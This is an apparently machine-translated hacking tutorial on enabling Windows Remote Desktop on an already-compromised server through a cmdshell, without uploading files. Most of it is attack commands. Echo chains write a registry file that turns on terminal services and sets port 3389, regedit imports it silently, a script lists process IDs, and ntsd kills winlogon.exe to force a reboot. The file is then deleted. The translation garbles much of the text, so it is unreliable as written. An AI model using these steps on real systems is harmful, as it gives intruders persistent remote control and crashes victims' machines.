This opening method, green, environmentally friendly, and non-polluting ~~ do not need to upload any documents to open the terminal, suitable for Win2K, XP, 2003. This paper is that the other party has been a SYSTEM permission that has been obtained through some way. Cmdshell ~~ Open the terminal service without passing any files.
First, Win 2K's terminal open terminal first writes a 3389.REG file with Echo, then imports to the registry, the Echo code is as follows:
echo Windows Registry Editor Version 5.00 >> 3389.regecho [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / netcache] >> 3389.regecho "Enabled" = "0" >> 3389.regecho [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon] >> 3389.regecho "ShutdownWithoutLogon" = "0" >> 3389.regecho [HKEY_LOCAL_MACHINE / SOFTWARE / Policies / Microsoft / Windows / Installer] >> 3389.regecho "EnableAdminTSRemote" = dword: 00000001 >> 3389 .regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server] >> 3389.regecho "TSEnabled" = dword: 00000001 >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / TermDD] >> 3389.regecho "Start" = dword: 00000002 >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / TermService] >> 3389.regecho "Start" = dword: 00000002 >> 3389.regecho [HKEY_USERS / .DEFAULT / Keyboard Layout / Toggle] >> 3389.Regecho "Hotkey" = "1" >> 3389.Regecho [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / TERMINAL Server / WDS / RDPWD / TDS / TCP] >> 3389.Regecho "Portnum ber "= dword: 00000D3D >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp] >> 3389.regecho" PortNumber "= dword: 00000D3D >> 3389.reg these codes ECHO To cmdshell, you can generate a 3389.REG file, followed by regedit / s 3389.Reg Import the registry. (If you want to change the terminal port, you can only change the above two D3Ds.) Because Win 2K will not take effect immediately like XP, it is necessary to restart the machine.
A simple approach is to end an important process with NTSD.exe (commands above Win 2K) to achieve the machine to restart! ! For example, Winlogon.exe, LSAss.exe can also be jumped out of the restart countdown (not very good ~) Winlogon.exe is turned off immediately to force the command to execute the command to perform the format NTSD -CQ -P PID how to know Winlogon. Exe's PID process number ~ The following script can list the PID: wscript.echo "PID ProcessName" for Each Ps in getObject ("WinMgmts: //./root/cimv2: win32_process") .instances_ Wscript.echo Ps.Handle & Vbtab & PS.NameNext Posts the following Echo code under the cmdshell window 1.vbe: echo wscript.echo "pid processname" >> 1.vbeecho for Each PS in getObject ("WinMgmts: // ./root/cimv2:win32_process").instances_ >> 1.vbeecho wscript.echo ps.handle ^ & vbtab ^ & ps.name >> 1.Vbeecho next >> 1.Vbe
After generating 1.vbe, check if the script comes out is wrong (only four lines, you can give it the above). Run 1.vbe Get the following results:
C: / Winnt / System32> CScript 1.vbecscript 1.vbemicrosoft (r) Windows Script Host version 5.1 for Windows Copyright (C) Microsoft Corporation 1996-1999. All Rights Reserved.
PID ProcessName0 System Idle Process8 System152 smss.exe180 csrss.exe200 winlogon.exe228 services.exe240 lsass.exe424 svchost.exe472 spoolsv.exe512 msdtc.exe616 svchost.exe628 KAVSvc.EXE660 llssrv.exe692 nvsvc32.exe728 regsvc.exe748 MSTask.exe776 alter. exe900 svchost.exe916 WinMgmt.exe1088 Dfssvc.exe484 Explorer.EXE1444 mdm.exe1340 Server.exe1224 ibguard.exe1252 KAVSvcUI.EXE1256 ibserver.exe1336 internat.exe1204 Uspds.exe720 bar.exe1288 dllhost.exe1580 inetinfo.exe1672 cmd.exe1464 pppoe.exe1704 regedit .exe316 cscript.exe
From the above, you can see that the PID number of Winlogon.exe is 200 running command ntsd -c q -p 200 (200 here to replace the PID of Winlogon.exe process)
Upset (NTSD.exe is the WIN own can be used to end any level process) waiting for gain ~~
Second, WinXP and Win2003 terminal open
Open the REG file code is as follows: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server] "fDenyTSConnections" = dword: 00000000 [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / Wds / rdpwd / Tds / tcp ] "PortNumber" = dword: 00000D3D [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp] "PortNumber" = dword: 00000D3D write a REG file with the following code for eCHO: echo Windows Registry Editor Version 5.00 >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server] >> 3389.regecho "fDenyTSConnections" = dword: 00000000 >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / Wds / rdpwd / Tds / tcp] >> 3389.regecho "PortNumber" = dword: 00000d3d >> 3389.regecho [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp] >> 3389.regecho "PortNumber" = dword: 00000d3d> > 3389.Regdit / s 3389.Regdel 3389.Reg This Terminal is not to restart if you want to change the port, just change the D3D of the above two portnumber to the corresponding decimal number of hexadecimal forms Yes! Convert it with a calculator. No matter whether the terminal is not need to restart, it is really wonderful. If you want to turn off the end, just change "fdenytsconnections" = dword: 00000000 = dword: 00000001
